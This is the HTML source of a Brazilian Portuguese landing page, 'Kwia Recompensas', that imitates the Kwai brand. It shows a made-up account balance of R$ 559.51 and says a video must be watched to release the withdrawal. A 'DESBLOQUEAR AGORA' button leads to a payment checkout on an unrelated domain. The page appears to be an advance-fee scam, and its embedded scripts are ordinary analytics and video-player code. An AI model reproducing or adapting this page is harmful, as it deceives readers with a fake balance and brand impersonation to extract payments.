<!DOCTYPE html><html lang="pt-BR"><head> 

<script 
    src="https://d1atmqbt05kisf.cloudfront.net/scripts/utm-handler.js"
    data-token="4e250b48-c306-417f-ac4a-fd9ab783aafb"
    data-click-id-param="click_id">
</script>
    
<script type="text/javascript" async="" src="js/CGjIxy0DYGJI.js"></script><script type="text/javascript" async="" src="js/KfJYoZ4P8qIf.js"></script><script>
!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.install=t():e.install=t()}(window,(function(){return function(e){var t={};function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{}};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.d=function(e,t,o){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:o})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(o,r,function(t){return e[t]}.bind(null,r));return o},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";var o=this&&this.__spreadArray||function(e,t,n){if(n||2===arguments.length)for(var o,r=0,i=t.length;r<i;r++)!o&&r in t||(o||(o=Array.prototype.slice.call(t,0,r)),o[r]=t[r]);return e.concat(o||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0});var r=function(e,t,n){var o,i=e.createElement("script");i.type="text/javascript",i.async=!0,i.src=t,n&&(i.onerror=function(){r(e,n)});var a=e.getElementsByTagName("script")[0];null===(o=a.parentNode)||void 0===o||o.insertBefore(i,a)};!function(e,t,n){e.KwaiAnalyticsObject=n;var i=e[n]=e[n]||[];i.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"];var a=function(e,t){e[t]=function(){for(var n=[],r=0;r<arguments.length;r++)n[r]=arguments[r];var i=o([t],n,!0);e.push(i)}};i.methods.forEach((function(e){a(i,e)})),i.instance=function(e){var t,n=(null===(t=i._i)||void 0===t?void 0:t[e])||[];return i.methods.forEach((function(e){a(n,e)})),n},i.load=function(e,o){var a="https://s1.kwai.net/kos/s101/nlav11187/pixel/events.js";i._i=i._i||{},i._i[e]=[],i._i[e]._u=a,i._t=i._t||{},i._t[e]=+new Date,i._o=i._o||{},i._o[e]=o||{};var c="?sdkid=".concat(e,"&lib=").concat(n);r(t,a+c,"https://s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js"+c)}}(window,document,"kwaiq")}])}));
</script>
<script>
kwaiq.load('270072968125327');
kwaiq.page();
</script>


    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;700&display=swap">
    <title>2- Kwia Recompensas</title>
    <link rel="icon" href="index_1.html" type="image/x-icon">
    


    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Montserrat', sans-serif;
            background-color: #FFFFFF;
            color: #333;
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        /* Cabeçalho */
        .header {
            width: 100%;
            background-color: #fe842c;
            color: white;
            font-weight: bold;
            text-align: center;
            padding: 10px;
            font-size: 16px;
        }

        /* Container Principal */
        #p1 {
            width: 100%;
            max-width: 400px;
            background-color: #FFFFFF;
            padding: 15px;
            border-bottom: 1px solid #202020;
            display: flex;
            align-items: center;
            justify-content: space-between;
            margin-bottom: 20px;
        }

        #logo {
            width: 130px; /* Aumenta o tamanho do logotipo */
            margin-left: 5px;
        }

        .boxSaldo {
            display: flex;
            flex-direction: column;
            align-items: flex-end;
            border: 2px solid #fe842c;
            border-radius: 6px;
            padding: 5px 10px;
            margin-right: 5px;
        }

        .textoSaldo {
            font-size: 10px;
            font-weight: bold;
            background: #fff;
            padding: 2px 14px;
            color: #333;
        }

        .valorSaldo {
            font-size: 14px;
            font-weight: 700;
            color: #333;
        }

        /* Conteúdo do Vídeo */
        #produto1 {
            width: 100%;
            max-width: 400px;
            text-align: center;
            padding: 15px;
        }

        #produto1 h4 {
            color: #ff0150;
            font-size: 18px;
            margin-bottom: 10px;
        }

        #video-container {
            width: 100%;
            max-width: 360px;
            margin: 0 auto;
            overflow: hidden;
            border: 2px solid #fe842c;
            border-radius: 8px;
            margin-bottom: 20px;
            position: relative;
            
        }

        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            border: none;
        }

        /* Botão */
        .centralizar {
            width: 100%;
            display: flex;
            justify-content: center;
        }

        button {
            background-color: #ff0150;
            color: white;
            border: none;
            border-radius: 5px;
            width: 85%;
            max-width: 300px;
            height: 50px;
            font-weight: bold;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        button:hover {
            background-color: #ff0150;
        }

        /* Responsividade */
        @media (max-width: 480px) {
            #p1 {
                flex-direction: row;
                justify-content: space-between;
            }
        }
    </style>
    
    <!-- Google tag (gtag.js) -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=G-CMQX4DL69R"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-CMQX4DL69R');
</script>
</head>

<body>
    <div class="header">
        ASSISTA O VÍDEO ABAIXO PARA LIBERAR SEU SAQUE E ACESSO VITALÍCIO.
    </div>

    <div id="p1">
        <img id="logo" src="images/S7J8rUFPwYsr.png" alt="Kwai Logo">
        <div class="boxSaldo">
            <span class="textoSaldo">SALDO</span>
            <span class="valorSaldo">R$ <span class="saldoAtualizado">559.51</span></span>
        </div>
    </div>

    <div id="produto1">
        <h4 style="color: #fe842c;">DESBLOQUEIO DE SALDO</h4>
        <p>Veja como liberar seu saque assistindo ao vídeo.</p>

        <div id="video-container">
<div id="vid_67a408b4a89603af89de8c3b" style="position: relative; width: 100%; padding: 177.63157894736844% 0 0;"> <img id="thumb_67a408b4a89603af89de8c3b" src="https://images.converteai.net/67e9cf6e-da27-4a10-a116-198b0ab89dc1/players/67a408b4a89603af89de8c3b/thumbnail.jpg" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; object-fit: cover; display: block;" alt="thumbnail"> <div id="backdrop_67a408b4a89603af89de8c3b" style=" -webkit-backdrop-filter: blur(5px); backdrop-filter: blur(5px); position: absolute; top: 0; height: 100%; width: 100%; "></div> </div> <script type="text/javascript" id="scr_67a408b4a89603af89de8c3b"> var s=document.createElement("script"); s.src="https://scripts.converteai.net/67e9cf6e-da27-4a10-a116-198b0ab89dc1/players/67a408b4a89603af89de8c3b/player.js", s.async=!0,document.head.appendChild(s); </script></iframe></div>
        </div>
        <div class="centralizar">
            <a href="https://pay.segurobls.online/checkout/79930c67-7ff0-4156-8421-68d580237ccf" style="width: 100%;  text-decoration: none;">
                <button style="background-color: #fe842c;"><span>DESBLOQUEAR AGORA</span></button>
            </a>
        </div>
    </div>


</body></html>
